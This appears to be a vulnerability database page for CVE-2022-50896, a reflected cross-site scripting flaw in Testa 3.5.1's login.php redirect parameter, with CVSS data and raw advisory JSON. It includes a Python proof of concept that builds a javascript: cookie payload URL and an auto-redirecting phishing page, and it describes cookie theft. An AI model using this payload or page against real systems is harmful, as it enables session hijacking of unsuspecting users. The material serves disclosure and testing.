Security Vulnerability Report
中文
CVE-2022-50896 CVSS 6.1 MEDIUM

CVE-2022-50896

Published: 2026-01-13 23:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Testa 3.5.1 contains a reflected cross-site scripting vulnerability in the login.php redirect parameter that allows attackers to inject malicious scripts. Attackers can craft a specially encoded payload in the redirect parameter to execute arbitrary JavaScript in victim's browser context.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Testa Online Test Management System 3.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import urllib.parse # CVE-2022-50896 PoC - Reflected XSS in Testa 3.5.1 login.php # Target: Testa Online Test Management System # Vulnerability: Unvalidated redirect parameter in login.php def generate_xss_payload(): """Generate XSS payload for the redirect parameter""" # Basic XSS payload - cookie stealing payload = "javascript:alert(document.cookie)" encoded_payload = urllib.parse.quote(payload) return encoded_payload def generate_poc_url(target_url): """Generate PoC URL with malicious redirect parameter""" payload = generate_xss_payload() # Construct the malicious URL poc_url = f"{target_url}/login.php?redirect={payload}" return poc_url def generate_html_phishing_page(target_url): """Generate HTML page that auto-triggers the XSS""" poc_url = generate_poc_url(target_url) html = f"""<!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <p>If you are not redirected, <a href="{poc_url}">click here</a></p> <script> // Auto-redirect to trigger XSS window.location.href = "{poc_url}"; </script> </body> </html>""" return html # Example usage if __name__ == "__main__": target = "http://testa-server.local" print("=== CVE-2022-50896 PoC ===") print(f"Target: {target}") print(f"\nMalicious URL:") print(generate_poc_url(target)) print("\n--- Attack Scenario ---") print("1. Attacker crafts malicious URL with XSS payload in redirect parameter") print("2. Victim clicks the link or visits phishing page") print("3. Victim's browser executes malicious JavaScript") print("4. Attacker steals session cookies or performs actions as victim")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50896", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:51.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Testa 3.5.1 contains a reflected cross-site scripting vulnerability in the login.php redirect parameter that allows attackers to inject malicious scripts. Attackers can craft a specially encoded payload in the redirect parameter to execute arbitrary JavaScript in victim's browser context."}, {"lang": "es", "value": "Testa 3.5.1 contiene una vulnerabilidad de cross-site scripting reflejado en el parámetro de redirección de login.php que permite a los atacantes inyectar scripts maliciosos. Los atacantes pueden crear una carga útil especialmente codificada en el parámetro de redirección para ejecutar JavaScript arbitrario en el contexto del navegador de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://web.archive.org/web/20220406031253/https://testa.cc/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51023", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/testa-online-test-management-system-reflected-cross-site-scripting-xss", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.